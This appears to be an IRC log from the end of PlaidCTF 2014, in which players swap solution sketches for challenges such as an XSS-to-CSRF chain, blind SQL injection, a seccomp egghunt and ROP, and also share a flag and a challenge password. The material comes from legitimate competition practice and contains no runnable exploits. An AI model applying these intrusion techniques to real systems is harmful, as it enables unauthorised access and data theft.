(17:05:06) qUit: (Beched) (6daa088b@gateway/web/freenode/ip.109.170.8.139) Ping timeout: 240 seconds
(17:05:07) (inter) at least i learned 2 things today
(17:05:19) (inter) 1. dont eat overnight chinese food
(17:05:28) (NK_) tylerni7 / cai_ well done, it was great
(17:05:31) (NK_) :)
(17:05:44) (inter) 2. buy ida
(17:05:51) (Adran) 1. seems like poor life choice
(17:05:59) (inter) well
(17:06:05) (chuckleberry) foundation: nice!
(17:06:07) (inter) some of the ppps
(17:06:14) (inter) ate overnight chinese food
(17:06:19) (inter) so i decided to do that as well
(17:06:25) (Adran) is that why we had a massive netsplit?!
(17:06:30) (inter) and as it turned out i like overnight pho better
(17:06:35) (Adran) the servers ate old Chinese food?
(17:06:45) (robbje) want zfs writeup
(17:06:46) (phiber) dwn, custom dns server with twisted and ttl=0 FTW
(17:06:54) (jix) foundation: I gave up following this async spaghetti mess
(17:06:56) (dwn) phiber: how do you set that up
(17:06:59) (sven) "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
(17:07:02) (sven) robbje: ^--
(17:07:04) (Adran) phiber: what did you use that for?
(17:07:06) (jix) foundation: instead I patched the bandwidth + weight calculation
(17:07:11) (dwn) would like to see a writeup on that, lol, phiber
(17:07:12) (inter) https://www.youtube.com/watch?v=WXX8MsT7v9M
(17:07:17) (jix) foundation: to make chandler the #1 candidate for everything
(17:07:17) (phiber) Adran, whatscat
(17:07:20) qUit: (Gut_) (uid24602@gateway/web/irccloud.com/x-lpojyjxhyocewncw) Quit: Connection closed for inactivity
(17:07:23) (upb) < dwn> how were we suppsoed to guess there was a flags table in whatscat ;_; <- haha, i gave up on that aswell, thought about reading out information_schema.tables but php munges . in txt record value for some reaosn
(17:07:25) (plaintext) who is in charge of the plaid twitter?
(17:07:26) (inter) cai_: when i ran into obstacles i listened to this
(17:07:27) (Adran) phiber: got a writeup?
(17:07:33) (_blasty_) ricky: tylerni7: mserrano: how much longer is bronies going to be up ?
(17:07:34) (inter) it magically calmed me down lul
(17:07:40) (_blasty_) I wanna refine some stuff in the AM
(17:07:45) (_blasty_) not fucking now, though
(17:07:48) (+tylerni7) plaintext: most of us have control of it
(17:07:58) (deject3d) anyone have strategies on solving brony? i don't really understand how attacking the internal target was supposed to work
(17:08:05) (inter) brony?
(17:08:09) (_blasty_) deject3d: XSS
(17:08:10) (inter) i know 2nd part
(17:08:14) (inter) deals with shit ton of stuff
(17:08:24) (robbje) sven: xor. ...
(17:08:29) (deject3d) yeah but the xss wasn't the attack on the actual target
(17:08:34) (foundation) btw, about brony, what was the first part, i did get the PHPSESSIONID , what then ?
(17:08:41) (dwn) _blasty_: the fuck did you use xss to do though
(17:08:42) (deject3d) i want to know how we were supposed to use the xss to attack the internal panel
(17:08:49) (_blasty_) deject3d: so using the XSS in the ponies website you can execute a CSRF POST against the login form of the portal page
(17:08:57) (nurfed_) xss->csrf->expolt leak->xss->csrf->exploit->/bin/bash
(17:08:59) (_blasty_) if you feed the portal page more than N chars in the OTP field it will segfault
(17:09:08) (_blasty_) if you keep feeding it chars it will trigger the "stack smashing detected" message
(17:09:18) (_blasty_) the "stack smashing detected" message has the progname in it
(17:09:19) (foundation) ooooo....
(17:09:21) (foundation) niceeee
(17:09:26) (_blasty_) like STACK SMASHING DETECTED: ./checkotp terminated
(17:09:40) (deject3d) what is the point of the csrf? we could already see the 'internal' login page, right? or am i misinformed
(17:09:43) (dwn) _blasty_: what values did you post to the login form though?
(17:09:43) (_blasty_) but the pointer to that argv0 checkotp string could be overwritten
(17:09:52) (_blasty_) so get your own input in the output again
(17:10:01) (_blasty_) then you basically elevevate XSS privileges to that domain
(17:10:09) qUit: (albntomat0) (8c201003@gateway/web/freenode/ip.140.32.16.3) Quit: Page closed
(17:10:10) (_blasty_) from where you can leak the admin cookie
(17:10:19) (_blasty_) we'll do a proper writeup
(17:10:22) (phiber) dwn, Adran https://privatepaste.com/6413fc0aca
(17:10:24) (_blasty_) this explanation sucks
(17:10:26) (_blasty_) part#2 is even cooler
(17:10:27) (deject3d) would appreciate it
(17:10:46) (deject3d) i tried using beef framework to start some attacks against the internal site but owell
(17:10:52) (inter) well
(17:10:52) (dwn) wow, you actually wrote your own dns server phiber. amazing.
(17:11:00) (inter) now i can go do my kush
(17:11:04) (inter) happily
(17:11:05) (inter) lul
(17:11:12) (_blasty_) I also "wrote" my "own" DNS server for whatscat, using some perl module :-P
(17:11:18) (inter) now that i figured out the stuff that i couldnt do :D
(17:11:23) (_blasty_) Net::DNS::Server or something
(17:11:24) (_blasty_) yay perl.
(17:11:36) qUit: (Guest75992) (80edcf34@gateway/web/freenode/ip.128.237.207.52) Ping timeout: 240 seconds
(17:11:39) (plaintext) we did whatscat with blind sqli
(17:11:42) (+tylerni7) dinner time for PPP
(17:11:50) (+tylerni7) we'll be back online laterz
(17:11:52) (_blasty_) we did whatscat by updating the email field in the DB
(17:11:59) (plaintext) tylerni7, I sent you a message :)
(17:12:01) (Adran) phiber: ugh, inject was dns
(17:12:06) (dwn) how did you all do tenement?
(17:12:07) (_blasty_) then requesting the reset page again for that user to leak back the value we inserted into the email field
(17:12:07) (Adran) didn't think about that. thanks
(17:12:19) qUit: (mrsmith67) (uid11196@gateway/web/irccloud.com/x-wrpmyrgkuuglgdje) Quit: Connection closed for inactivity
(17:12:20) (dwn) it was 100pts so it must've been incredibly easy
(17:12:24) (dwn) but the seccomp
(17:12:46) (foundation) dwn: no need for the shell, just egghunt for PPPP in memory
(17:12:52) (+pctf_scoreboard) o/
(17:12:57) qUit: (shabgrd) (~mostafa@unaffiliated/shabgard) Ping timeout: 245 seconds
(17:13:04) (Adran) the scoreboard is speaking!
(17:13:10) (dwn) was PPPP in a static location
(17:13:32) (foundation) dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
(17:13:40) (dwn) oh, neat
(17:13:44) (dwn) thanks will remember that
(17:13:50) (foundation) it was in some mmaped region , but we didn't know where
(17:14:05) (deject3d) was there a trick to solving polygonshifter web100
(17:14:13) (plaintext) just blind sqli
(17:14:19) (plaintext) nothing extra
(17:14:21) (foundation) afaik bsqli
(17:14:24) (deject3d) wait, it was a sqli
(17:14:26) (deject3d) oh god damnit
(17:14:35) (plaintext) i guess I will make quick a writeup on that too
(17:14:39) (Tapyroe__) !! -.-
(17:14:49) (pd7) plaintext: are your writeups online yet?
(17:14:59) (plaintext) pd7: i made one on halphow2js
(17:15:01) (Tapyroe__) sitting here thinking about all the problems i could've solved haha....
(17:15:17) (dwn) was there some neat way to evaluate all the templates in G++ for you
(17:15:18) (nurfed_) web100 was stupid :/
(17:15:18) (geobot) on web100 chicken
(17:15:22) (Tapyroe__) or rather, should've been able to solve haah
(17:15:28) (dwn) because we just worked G++ out on paper
(17:15:29) (D3AdCa7_) Is polygonshifter can be solved by union way?
(17:15:30) (plaintext) plaid retweeted it but I removed that tweet dammit, because there was a typo :P
(17:15:32) (deject3d) i took the problem description at face value and tried to actually brute force the login
(17:15:44) (plaintext) and now it's not retweeted, no fame :(
(17:15:50) (D3AdCa7_) My bsqli script runs so slow
(17:16:08) (foundation) dwn: apparentlly you needed to figure out that it's actually just doing matrix multiplication over galois field 257 ...
(17:16:12) (pcc7) a writeup for pyjail?.
(17:16:27) (deject3d) the html comment "admin / ???????" made me think it was actually a 7 char password. "polygon" and "shifter" are both 7 chars each, so i wrote a script to try every combination involving case
(17:16:37) (deject3d) WHAT A WASTE
(17:17:07) (D3AdCa7_) u r so cute.. deject3d :)
(17:17:20) (plaintext) it wasn't misc 10 though :P
(17:17:37) (iZsh) how did you guys solve tenement? because it took me forever and some ppl solved it quickly, so i'm wondering if i missed an easier way
(17:17:49) (dwn) plaintext: link to your how2js writeup?
(17:18:02) (dwn) iZsh: 18:14 < foundation> dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
(17:18:17) (cimmi_) what was actually the answear to the math is hard?
(17:18:24) (plaintext) http://balidani.blogspot.pt/2014/04/plaidctf-halphow2js-writeup.html
(17:18:28) (mathiasbynens) plaintext: in your how2js writeup, “The keys cannot be in increasing order” → wut?
(17:18:38) (plaintext) mathiasbynens: is that a mistake?
(17:18:42) (plaintext) let me check
(17:18:49) (foundation) iZsh: took a while to figure out how not to segfault on invalid pages
(17:18:57) (plaintext) oh right, lol
(17:18:58) (plaintext) i'm dumb
(17:19:02) (D3AdCa7_) a script for web100 https://gist.github.com/D3AdCa7/10604720
(17:19:03) (foundation) cimmi_: 100000
(17:19:03) (plaintext) I'll add a clarification
(17:19:16) jOin: (Bono) (1b7f597e@gateway/web/freenode/ip.27.127.89.126)
(17:19:19) (mathiasbynens) plaintext: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme they’re sorted lexicographically
(17:19:20) (iZsh) dwn: what did you write? i'm not sure i follow, but i dont remember exactly the whole thing :)
(17:19:24) (mathiasbynens) but you knew that
(17:19:32) (foundation) cimmi_: google excel 65000 100000 for clarification
(17:19:34) (plaintext) yeah, brainfart
(17:19:40) (mathiasbynens) plaintext: i'll add a link to your write-up, let me know if you write more!
(17:19:47) (plaintext) thanks :)
(17:19:51) (plaintext) I'll do one on polygon I guess
(17:19:58) (cimmi_) yea I actually did read it when I tried to find the answear
(17:20:07) (dwn) iZsh: tenement basically just executed your buffer but there was seccomp so you're not going to read the file or get shell. I wasn't able to get around this because I couldn't figure out how to find the flag in memory. foundation just dumped the whole memory.
(17:20:20) (skuu) plaintext: did you mention hudak? if so; remember the flag so I can check where I went wrong?
(17:20:30) (iZsh) dwn: we solved it completely differently, we called malloc(16) and had some smart filtering to recognize the proper pointers to follow
(17:20:33) (cimmi_) I submitted 10k and not 100k when looking at that one. stupid
(17:20:44) (|x_x|) http://csrc.tamuc.edu/css/?p=156 Lazy man's doge_stege writeup
(17:20:46) (foundation) iZsh: we just wrote egghunt shellcode that traversed the memory , the trick was to see which addresses were actually mapped , using write() you can check if the address is valid or not
(17:20:55) (plaintext) i think I have the hudak flag
(17:21:07) (iZsh) foundation: oh i see
(17:21:11) (plaintext) skuu: 4t_l34st_it_was_1mperat1v3...
(17:21:17) (skuu) oh wow, thanks
(17:21:17) (iZsh) well, we did it the complicated way ;-)
(17:21:17) (|x_x|) http://csrc.tamuc.edu/css/?p=152 Sanity Check, Heartbleed, and Multiplication is Hard as well. ya know, in case ya had problems with Sanity Check.
(17:21:23) (skuu) soo close
(17:21:31) (abuss) cimmi_, ouch; why wouldn't you just submit 100000? :P
(17:21:36) qUit: (zzoru) (6e23254c@gateway/web/freenode/ip.110.35.37.76) Ping timeout: 240 seconds
(17:21:46) (abuss) sanity check was a really hard web problem
(17:21:47) jOin: (zzoru) (6e23254b@gateway/web/freenode/ip.110.35.37.75)
(17:21:53) (iZsh) foundation, dwn : So libjansson has a reference-count based object system, and when a successful address has been found from the json array, it free()'s both the json integer object and the json array containing the same integer, so when dumping all the free()'d objects (by malloc'ing 16 bytes and dumping the contents), you'll see the reference count of 0 for a lot of objects, and reference count -1 for the chosen address.
(17:21:53) (iZsh) Then &0xfffff000 it and dump the buffer, and you get the flag;
(17:22:01) qUit: (deject3d) (
[email protected]) Quit: Computer has gone to sleep.
(17:22:03) (abuss) <f5><f5><f5><f5><f5> ooh a flag - submit? no it timed out <f5> <f5> <f5> <f5> <f5>
(17:22:19) (cimmi_) abuss: who knows? atleast not me
(17:22:19) (abuss) "Logged in as Samurai, abort!"
(17:22:19) (dwn) nice iZsh
(17:22:34) (iZsh) the write() trick is nice :)
(17:22:38) (iZsh) much easier
(17:22:41) (spq) admins: what was wrong with the scoreboard being unreachable from some places in the first hours?
(17:22:46) (iZsh) i spent hours and hours no tenement
(17:22:54) (dwn) yeah for only 100pts
(17:23:02) (dwn) ;_;
(17:23:08) (iZsh) i wonder how we were supposed to solve it
(17:23:16) (iZsh) if they expected 100pt
(17:23:16) (geobot) only 100pt for a bit, or a school/work day - in pm about rarverseme?
(17:23:36) (iZsh) tylerni7: what was the expected way?
(17:23:43) (mathiasbynens) iZsh: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/tenement#readme dump the whole memory then run strings
(17:24:10) jOin: (irctc035) (4406454f@gateway/web/freenode/ip.68.6.69.79)
(17:24:17) (dwn) all these todo writeups mathiasbynens, lol
(17:24:23) (iZsh) mathiasbynens: lol
(17:24:40) (iZsh) mathiasbynens: that could be summarized as "get the flag"
(17:25:09) (mathiasbynens) dwn: yeah the point is for people to help ;)
(17:25:23) (mathiasbynens) iZsh: inorite
(17:26:17) qUit: (D3AdCa7_) (d220a27e@gateway/web/freenode/ip.210.32.162.126) Quit: Page closed
(17:26:23) qUit: (inter) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Would you like to know more?
(17:27:07) qUit: (irctc035) (4406454f@gateway/web/freenode/ip.68.6.69.79) Client Quit
(17:27:48) (dwn) this hash length extension thing is the most obscure web thing ever. i love it
(17:29:01) (dwn) ppp: will the challenge sources be released? or some way for us to run them ourselves to try to complete them?
(17:29:07) (iZsh) well hash length extension is a classic
(17:29:21) (dwn) is it? I've been ctfing for about a year and don't remember seeing it
(17:29:40) jOin: (handlr) (~handlr@unaffiliated/handlr)
(17:29:51) (iZsh) it's not the first time i see one, but can't recall where
(17:30:13) (upb) yeah but how the hell was it supposed to be guessed that the serialized string is reversed before hashing?
(17:30:23) (iZsh) anyway, i'm off
(17:30:50) (phiber) upb, get admin.php source
(17:31:08) (|x_x|) Which could be obtained by feeding admin.php through the ?page= variable.
(17:31:20) qUit: (ijonas) (534e453a@gateway/web/freenode/ip.83.78.69.58) Quit: Page closed
(17:31:50) qUit: (nonconstant) (c1e17dfd@gateway/web/freenode/ip.193.225.125.253) Quit: Page closed
(17:32:36) (Digihash) Goodbye, thank you guys for the great CTF
(17:32:45) (dwn) upb: you could get the source
(17:32:46) (grollicus_) did you ever sql inject via dns records? that challenge was especially funny because there seems to be some vuln in the management software of the first domain we tried to use
(17:33:04) (dwn) grollicus_: I actually encountered the same thing
(17:33:05) (upb) HAH
(17:33:10) (dwn) reported it
(17:33:12) (phiber) I could have solved parlor in time if python/pypy wasn't so slow
(17:33:18) (poppopret) http://conceptofproof.wordpress.com/2014/04/13/plaidctf-2014-web-150-mtgox-writeup/
(17:33:25) (poppopret) my mtgox web 150 writeup
(17:33:41) (spq) how did you solve harry potter?
(17:33:41) (phiber) tylerni7, you could have given more bits of the md5 :/
(17:34:09) (sven) or you could've written your brute forcer in c :P
(17:34:10) (chuckleberry) huh, of all of the challenges most people think mtgox needed a writeup?
(17:34:22) (phiber) I didn't have enough time for that
(17:34:47) (phiber) there were like 10min left when I had the attack implemented
(17:34:58) (chuckleberry) life's hard
(17:35:23) (sven) we ran out of time to solve moscow too - it happens :)
(17:35:27) (foundation) 4st _l34t t1mpera _wa _it_ at_ as_1v3... << damn , so close
(17:35:37) (chuckleberry) poppopret: i didn't even get a mention!
(17:36:01) (chuckleberry) bad form
(17:36:01) (poppopret) huh?
(17:36:08) (chuckleberry) remember, you pmd me
(17:36:10) (spq) regarding harry potter: i really had problems finding gadgets, made it with very weird add [rbx-something], cl; cl was horrible to control - when i had that, i patched one got entry to point to system and the did a dereferencing call to that entry
(17:36:11) (chuckleberry) asked me for help...
(17:36:39) (poppopret) ok how would you like to be credited :)
(17:36:43) (foundation) spq: same here afaik
(17:36:47) (chuckleberry) i was joking
(17:37:21) (poppopret) hahah ok
(17:37:36) (spq) foundation: how did you control cl? the add cl, cl + dec cl ?
(17:38:20) (naehrwert) spq, writing byte by byte using mov [rax], bl @ 401798
(17:38:52) (spq) naehrwert: well i had writing byte by byte working but didnt know what to do
(17:38:58) (skuu) spq: foundation: we didn't use system(), we used vsyscalls execve
(17:39:01) (plaintext) how did you guys solve sass btw?
(17:39:12) (plaintext) we thought about jumping to read to cause one more buffer overflow, but it was too late
(17:39:14) (_blasty_) hey naehrwert , you were also playing ?
(17:39:20) (spq) skuu: which vsyscalls?
(17:39:31) (spq) the stuff in 0xfffff... ?
(17:39:35) (skuu) yep
(17:39:39) (spq) damn
(17:39:40) (naehrwert) hi _blasty_ :) yup with skuu and foundation and some other nice guys
(17:39:46) (_blasty_) cool :)
(17:39:50) (_blasty_) what team? Binary bandits?
(17:39:56) (naehrwert) gn00bz
(17:39:59) (_blasty_) ah, right
(17:40:21) (spq) tried that, didnt work on my machine, detected unaligned jump into the page
(17:40:37) (skuu) yup, ubunutu and what not catches it
(17:40:39) (skuu) but works on debian :D
(17:40:43) (spq) damn
(17:40:44) (skuu) 3.2 kernel ish
(17:40:54) (spq) that would have meant 1-2hrs less :)
(17:41:45) (spq) but was interesting how one can control a register with such obscure gadgets :)
(17:43:35) (plaintext) anyone who solved sass?
(17:44:36) (naehrwert) so for parlor, is that '+' meant as concat. or addition?
(17:45:02) (phiber) haha
(17:45:29) (Galactic) dwn: RuCTF had a hash length extension attack.
(17:45:30) (naehrwert) I tried like every possible combo but could never reproduce server output -.-
(17:45:55) (phiber) I also got stuck there and had to ask about it
(17:46:17) (sven) int(md5(servernonce.decode("hex") + clientnonce + "\n").hexdigest(), 0x10)
(17:46:24) (alexwebr) Read all the scrollback, didn't see TL;DR for freya. Looked like MS-KKDPC, said FTS after reading krb5 ASN.1 from RFC. Anybody get it?
(17:46:33) (sven) i got it
(17:46:38) (sven) it was annoying as fuck :)
(17:46:48) (naehrwert) I'm pretty sure that was one way I tried it too, hmm :D
(17:47:09) (sven) alexwebr: you need to grab the http branch from https://github.com/nalind/krb5/compare/http
(17:47:36) (sven) and then change around /etc/krb5.conf until you can finally kinit ppp and then ssh
[email protected]
(17:48:09) (alexwebr) sven: cool, and "shellpls" was actually the password?
(17:48:16) (sven) for the kerberos login, yeah
(17:48:22) (sven) (the kinit ppp part)
(17:48:51) qUit: (Bono) (1b7f597e@gateway/web/freenode/ip.27.127.89.126) Quit: Page closed
(17:49:24) (alexwebr) sven: Cool. I was expecting I'd have to write a proxy thing myself. Cool that there's code already. Thanks :-)
(17:49:42) (sven) yeah, i started writing my own proxy when i googled for some magic constant and found that git :-)
(17:50:01) pArt: (Kasalehlia) (
[email protected]) "(V) ( ;,,,; ) (V) Why not Zoidberg?"
(17:50:05) (sven) when i saw frozencemetery was the author of that patch i knew i was looking in the right direction ;)
(17:50:15) (alexwebr) Haha
(17:50:24) (sven) and then i failed for 3 hours because ssh was linked against some wrong version of the library \o/
(17:53:14) (|x_x|) http://csrc.tamuc.edu/css/?p=169 Twenty Writeup
(17:58:44) nIck: (64MAAAC71) is now known as (kaliman)
(17:58:59) qUit: (jablonskim) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Po-ta-to, boil em, mash em, stick em in a stew.
(17:59:05) qUit: (chrissing) (
[email protected]) Remote host closed the connection
(17:59:14) (cimmi_) any parlor writeups?
(18:04:16) (plaintext) i guess everyone is sleeping right now
(18:05:13) (|x_x|) Sleeping or realizing they just spent a weekend eating cold pizza and hacking instead of doing Calculus III homework that is due tomorrow.
(18:05:34) (plaintext) lol I do have an assignment due tomorrow
(18:05:42) (plaintext) crap
(18:05:59) (rray) assignment + essay ;_;
(18:08:34) (tokki) fak i wanted to log the whole channel
(18:08:40) (tokki) but this webirc killed it
(18:09:14) qUit: (batzig) (
[email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
(18:09:16) (tokki) any angel who wants to past it on pastebin <3
(18:09:19) (deject3d) i get to learn haskell tonight, yay procrastination
(18:09:51) (plaintext) deject3d: did you solve hudak?
(18:09:57) (chuckleberry) i need to learn why i'm so fucking bad at ctfs and how to fix that
(18:10:10) (deject3d) no, but i just went through my professors slides and literally saw the hudak name
(18:10:20) (deject3d) and was like "oh must have been a haskell challenge"
(18:10:29) (plaintext) well it was, kinda, sorta
(18:11:07) (dwn) |x_x|: due tomorrow? wow, how nice. mine is midnight tonight ;_;
(18:11:27) (plaintext) dwn: what timezone?
(18:11:36) (Adran) tokki: sure
(18:11:54) (dwn) plaintext: EST
(18:12:01) (|x_x|) dwn: Mine is due at noon tomorrow.
(18:12:25) (dwn) just need to pwn this submission server and i'll be set